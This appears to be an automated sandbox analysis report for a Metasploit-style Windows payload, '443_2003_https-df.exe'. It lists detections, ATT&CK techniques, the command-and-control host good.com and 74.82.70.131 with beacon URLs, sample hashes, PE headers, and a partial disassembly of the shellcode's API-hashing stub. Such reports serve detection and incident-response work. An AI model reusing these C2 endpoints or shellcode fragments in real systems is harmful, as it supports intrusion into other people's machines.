              Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.LOG1.4.dr, Amcache.hve.4.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.LOG1.4.dr, Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: Amcache.hve.LOG1.4.dr, Amcache.hve.4.drBinary or memory string: MsMpEng.exe

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 443_2003_https-df.exe, type: SAMPLE
              Source: Yara matchFile source: 1.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading
              1
              Process Injection
              1
              Process Injection
              OS Credential Dumping11
              Security Software Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              DLL Side-Loading
              LSASS Memory1
              System Information Discovery
              Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636969 Sample: 443_2003_https-df.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 96 12 good.com 2->12 16 Found malware configuration 2->16 18 Malicious sample detected (through community Yara rule) 2->18 20 Antivirus / Scanner detection for submitted sample 2->20 22 4 other signatures 2->22 7 443_2003_https-df.exe 2->7         started        signatures3 process4 dnsIp5 14 good.com 74.82.70.131, 443, 49683 RIMBLACKBERRYCA Canada 7->14 10 WerFault.exe 19 16 7->10         started        process6

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              443_2003_https-df.exe78%VirustotalBrowse
              443_2003_https-df.exe84%ReversingLabsWin64.Hacktool.MetaSploit
              443_2003_https-df.exe100%AviraTR/Crypt.XPACK.Gen7
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://www.blackberry.com2rI_qI0%Avira URL Cloudsafe
              https://www.blackberry.com2rI0%Avira URL Cloudsafe
              https://cdn123.offseccdn.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S0%Avira URL Cloudsafe

              Download Network PCAP: filteredfull

              NameIPActiveMaliciousAntivirus DetectionReputation
              good.com
              74.82.70.131
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://cdn123.offseccdn.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_Sfalse
                • Avira URL Cloud: safe
                unknown
                http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_Sfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://good.com/-443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://good.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://upx.sf.netAmcache.hve.4.drfalse
                        high
                        https://good.com/L443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.blackberry.com2rI_qI443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.blackberry.com443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000002.1865381329.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000003.1488458239.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000003.1488542177.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000001.00000002.1865696292.0000000002B90000.00000040.00001000.00020000.00000000.sdmpfalse
                            high
                            https://www.blackberry.com2rI443_2003_https-df.exe, 00000001.00000002.1865209545.000000000048B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            74.82.70.131
                            good.comCanada
                            18705RIMBLACKBERRYCAfalse
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1636969
                            Start date and time:2025-03-13 09:52:25 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 29s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:443_2003_https-df.exe
                            Detection:MAL
                            Classification:mal96.troj.winEXE@2/6@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 67%
                            • Number of executed functions: 4
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 40.71.93.126, 40.126.31.73, 4.175.87.197
                            • Excluded domains from analysis (whitelisted): onedsblobvmssprdeus02.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            good.comSecuriteInfo.com.Win32.SpywareX-gen.27164.12067.exeGet hashmaliciousSystemBCBrowse
                            • 52.60.87.163
                            https://kissingwills555.github.io/teethteethGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                            • 108.179.193.59
                            https://down.acting-good.com/Get hashmaliciousUnknownBrowse
                            • 104.21.89.148
                            http://linkangood.com/21ef897172770ca75d.jsGet hashmaliciousUnknownBrowse
                            • 5.149.254.180
                            http://linkangood.comGet hashmaliciousUnknownBrowse
                            • 5.149.254.210
                            https://www.nireos.com/hyperspectral-imaging/Get hashmaliciousUnknownBrowse
                            • 5.149.254.180
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            RIMBLACKBERRYCAyakov.spc.elfGet hashmaliciousMiraiBrowse
                            • 216.9.249.37
                            z0r0.x86.elfGet hashmaliciousMiraiBrowse
                            • 68.171.249.33
                            g4za.x86.elfGet hashmaliciousUnknownBrowse
                            • 68.171.249.25
                            mpsl.elfGet hashmaliciousUnknownBrowse
                            • 67.223.68.118
                            loligang.ppc.elfGet hashmaliciousMiraiBrowse
                            • 208.93.75.245
                            arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            • 206.124.114.77
                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                            • 68.171.237.10
                            m68k.elfGet hashmaliciousUnknownBrowse
                            • 67.223.69.122
                            la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                            • 68.171.237.27
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19faktura_FV2025020637756.htmlGet hashmaliciousUnknownBrowse
                            • 74.82.70.131
                            SecuriteInfo.com.FileRepMalware.26489.28570.exeGet hashmaliciousUnknownBrowse
                            • 74.82.70.131
                            Bill Of Ladding & PL AWB No.1669134316.vbsGet hashmaliciousGuLoaderBrowse
                            • 74.82.70.131
                            Payment_Advise.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 74.82.70.131
                            FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 74.82.70.131
                            4500149631.vbeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 74.82.70.131
                            comprobante de pago.exeGet hashmaliciousGuLoaderBrowse
                            • 74.82.70.131
                            comprobante de pago.exeGet hashmaliciousGuLoaderBrowse
                            • 74.82.70.131
                            No context
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.0043118873206132
                            Encrypted:false
                            SSDEEP:96:IaFuu8d9sbhEod7JfTQXIDcQqc6mcEKcw34eE+HbHg/KAgOg0dl/phsv5o1OyWCB:rAuk9D0kigMSjZThGzuiFNZ24lO87
                            MD5:816CD8139B4D91B343BBE2FD5B5669D6
                            SHA1:26EF2DD05D0EE26A8268BC8EF5D2149FB58818B5
                            SHA-256:BD1ADF49D3C67F976463F8D87089F709B6936F8FB0E148FBADFD6F510A810812
                            SHA-512:0688D06C54431B8ED4AE7BBA1591AFF6F30145D32B1AEA8563688A49FFB7806F7570E7C1B65AFFB81B01BF4D160EC0A683BD96B37B4C4A490F3DA8ADC935179C
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.3.2.9.6.2.6.2.5.9.5.3.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.3.2.9.6.2.6.7.2.8.2.8.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.e.a.c.d.d.8.-.2.0.d.4.-.4.e.2.7.-.9.6.f.f.-.3.b.3.3.8.a.8.f.f.3.6.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.f.c.8.d.7.c.-.1.4.d.d.-.4.5.5.3.-.b.6.e.6.-.5.b.b.b.f.6.6.5.7.3.6.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.4.4.3._.2.0.0.3._.h.t.t.p.s.-.d.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.9.-.2.0.0.6.-.2.8.6.c.f.5.9.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.2.6.6.3.5.8.5.1.8.7.a.0.b.2.c.d.1.c.4.4.a.2.6.6.2.e.9.9.c.3.0.0.0.0.f.f.f.f.!.0.0.0.0.4.0.5.4.b.e.8.8.7.9.b.4.5.8.c.0.3.4.3.4.0.b.1.9.3.1.1.b.a.a.4.2.2.1.8.c.2.1.6.d.!.4.4.3._.2.0.0.3._.h.t.t.p.s.-.d.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Mini DuMP crash report, 14 streams, Thu Mar 13 08:53:46 2025, 0x1205a4 type
                            Category:dropped
                            Size (bytes):160232
                            Entropy (8bit):1.4455567755816838
                            Encrypted:false
                            SSDEEP:768:Q9yIcQwFsCuvAjvgfQ7YAgc4bha62wl9nb:QfmsCuojvgfQ7YAgc4bha6lpb
                            MD5:4C68CF5BD7F33C1A8634D0FD61F20EFC
                            SHA1:E377645193489767B605CBD408334261FA2473C6
                            SHA-256:3088D5D3B17D1C855992AC9CD6590152260B512063E754F8479A849D21CF62DF
                            SHA-512:053CBA7AD2105624D5040FCF9A622FD9C11B03CC2B26EA790473DBE10E5B83D0C755B24739B4350A1538C3B782B9DD2AB6A69DC70F267AEF32FE6FA47FC1F45A
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... ..........g.........................................c..........T.......8...........T...........xG..p*........... ..........."..............................................................................eJ......D#......Lw......................T.......\......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8796
                            Entropy (8bit):3.7088820347658764
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJlun+JB6YZ3M5gmfZ4bQpD989bSEcfRGm:R6lXJEW6Y5KgmfZUSnf5
                            MD5:55F5B04232CF560F9EA65012DD2FD3D8
                            SHA1:BEB9F65D1B8BF9624E6D39636244BE6E68BED464
                            SHA-256:C9D04123B874D0E5FCA9351C837CDD7EED13D9853E507235A967427FCB04A7F6
                            SHA-512:E1B57A7B1FB9A3D88A0CC150F289D06527EE62872244495153654055753ABF8E30A85948508B6DD5E77847879931DE1F6387BCD98720C429EACFF4EA673C67E7
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.4.<./.P.i.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4719
                            Entropy (8bit):4.505808223938844
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsfJg771I9GZWpW8VYWRYm8M4JDtOKFNyq85kCOhLLBJBd:uIjfBI7No7VoJJJMCLdJBd
                            MD5:74BA99FF1048E90ACC17715F863A6C48
                            SHA1:80A577EBFF5F6E196A8BC1828887119C8FEB3FF5
                            SHA-256:4DCE9CA2A9DF3162AEC3E3128C5FC289A787CF1B31ACA8336A63A827815BD3C5
                            SHA-512:4FE0D8DA1B5F370B22540C5D78D9D66D935C28B46482711861C481CB39BC7BB26FD391497C050B22166DCE0C3B5B4B1B59D996B7107A05BCA4B9718824900444
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="758876" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.473442401912993
                            Encrypted:false
                            SSDEEP:6144:q9Zfpi6ceLPx9skLmb0fUZWSP3aJG8nAge03BQqZaKFFIeC/DNcXRtdLrI:eZHtUZWOcxQqYzruhtC
                            MD5:18886A7E33CC39A4A70276BEEF3F4EEC
                            SHA1:6452F4999F663EF588066E6C60F3BC2FE32B6219
                            SHA-256:C98B82A7E261E52502066C5B9E87093E70AE5B7DB28AC02E7307726AD9E997B8
                            SHA-512:2113766E13C26580C4C92CC23B766740375AFEBE2A9B5C45F1C078C991C1F1905254D466FE30F8B50AE9DDF2AD6C935342D4121F2B57B0EE5E1D3DAB8D2A5C2B
                            Malicious:false
                            Reputation:low
                            Preview:regfL...L....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[.d...............................................................................................................................................................................................................................................................................................................................................|.M ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):32768
                            Entropy (8bit):3.922787775675884
                            Encrypted:false
                            SSDEEP:768:yvwDoUrCjyutmUu/fR86dzsjO2qloWysUe/a9X:yvkuMUuHhIbms
                            MD5:14C6160A38CB8FEDF4E16D851D6CB4AA
                            SHA1:D872E876F61941A74B9C620195894105511FD0D2
                            SHA-256:74F0146024163CEF2AFC3BBDDA34AF3FCE4876D6677D99CCE0CF36B1A8CDA67B
                            SHA-512:A960007DD8FD3F944DEB8097569BB49F16EC8F8E270475788C47BD2682A07CDC0A1E352DE94E7B7CF2CB21EE3EF9EE8259DDF998188E3C09AA3B54CE5C55D143
                            Malicious:false
                            Reputation:low
                            Preview:regfK...K....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..[.d...............................................................................................................................................................................................................................................................................................................................................z.M HvLE.n......K............Mt...........Np..................................... ..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........^...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...
                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                            Entropy (8bit):1.7373895378352873
                            TrID:
                            • Win64 Executable GUI (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:443_2003_https-df.exe
                            File size:7'168 bytes
                            MD5:8d9c0f42baf129d1b430a01463dd7870
                            SHA1:4054be8879b458c034340b19311baa42218c216d
                            SHA256:b3ffbb213580aac6f9dc8d7ea321bd61be3e5cd41647e29aabeaedee2bfc4b83
                            SHA512:02831aafecd02359f63e8f13f50835ccd1e76abfd23b9586156351ca3ce5f7e1cb9846a6c64f538c9a9c9d2b96a0317a10ae5b6ef4631d67b30da61ba3b8db02
                            SSDEEP:24:eFGStrJ9u0/6ikY/nZd8rBQAV2G1Y+HKkn2DOIRwQ78IW29buoR9svcJBepmB:is0mYb4BQWq+H7CO1Q7PWAqoRikJDB
                            TLSH:D2E1B32372391CF6C89C463B4A63D04B65489B347F27E3FA8B14020FB9F201139B1C86
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9$..}E..}E..}E..Z...~E..}E~..E..t=..|E..t=..|E..Rich}E..................PE..d...}<.K..........#......0...........@.........@...
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x140004000
                            Entrypoint Section:.jcho
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x4BC63C7D [Wed Apr 14 22:06:53 2010 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:b4c6fff030479aa3b12625be67bf4914
                            Instruction
                            cld
                            dec eax
                            and esp, FFFFFFF0h
                            call 00007F4F04C09661h
                            inc ecx
                            push ecx
                            inc ecx
                            push eax
                            push edx
                            push ecx
                            dec eax
                            xor edx, edx
                            push esi
                            dec eax
                            mov edx, dword ptr [edx+60h]
                            dec eax
                            mov edx, dword ptr [edx+18h]
                            dec eax
                            mov edx, dword ptr [edx+20h]
                            dec eax
                            movzx ecx, word ptr [edx+4Ah]
                            dec eax
                            mov esi, dword ptr [edx+50h]
                            dec ebp
                            xor ecx, ecx
                            dec eax
                            xor eax, eax
                            lodsb
                            cmp al, 61h
                            jl 00007F4F04C09594h
                            sub al, 20h
                            inc ecx
                            ror ecx, 0Dh
                            inc ecx
                            add ecx, eax
                            loop 00007F4F04C0957Fh
                            push edx
                            inc ecx
                            push ecx
                            dec eax
                            mov edx, dword ptr [edx+20h]
                            mov eax, dword ptr [edx+3Ch]
                            dec eax
                            add eax, edx
                            cmp word ptr [eax+18h], 020Bh
                            jne 00007F4F04C09608h
                            mov eax, dword ptr [eax+00000088h]
                            dec eax
                            test eax, eax
                            je 00007F4F04C095F9h
                            dec eax
                            add eax, edx
                            inc esp
                            mov eax, dword ptr [eax+20h]
                            mov ecx, dword ptr [eax+18h]
                            dec ecx
                            add eax, edx
                            push eax
                            jecxz 00007F4F04C095E8h
                            dec eax
                            dec ecx
                            inc ecx
                            mov esi, dword ptr [eax+ecx*4]
                            dec ebp
                            xor ecx, ecx
                            dec eax
                            add esi, edx
                            dec eax
                            xor eax, eax
                            lodsb
                            inc ecx
                            ror ecx, 0Dh
                            inc ecx
                            add ecx, eax
                            cmp al, ah
                            jne 00007F4F04C09583h
                            dec esp
                            add ecx, dword ptr [esp+08h]
                            inc ebp
                            cmp ecx, edx
                            jne 00007F4F04C0956Ah
                            pop eax
                            inc esp
                            mov eax, dword ptr [eax+24h]
                            dec ecx
                            add eax, edx
                            inc cx
                            mov ecx, dword ptr [eax+ecx*2]
                            inc esp
                            mov eax, dword ptr [eax+1Ch]
                            dec ecx
                            add eax, edx
                            inc ecx
                            mov eax, dword ptr [eax+ecx*4]
                            dec eax
                            add eax, edx
                            inc ecx
                            pop eax
                            inc ecx
                            pop eax
                            pop esi
                            pop ecx
                            pop edx
                            inc ecx
                            pop eax
                            inc ecx
                            pop ecx
                            inc ecx
                            pop edx
                            dec eax
                            sub esp, 20h
                            inc ecx
                            Programming Language:
                            • [IMP] VS2005 build 50727
                            • [ASM] VS2008 SP1 build 30729
                            • [LNK] VS2008 SP1 build 30729
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x43580x6c.jcho
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x43c80x8.jcho
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x30000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x104e0x1200a4a5deae25708a9e05f50bcad7075c86False0.025390625data0.16810049402497224IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x30000x840x20031b58e4b44359a1fdeebdccbe8f7a423False0.158203125data0.9669929845987311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
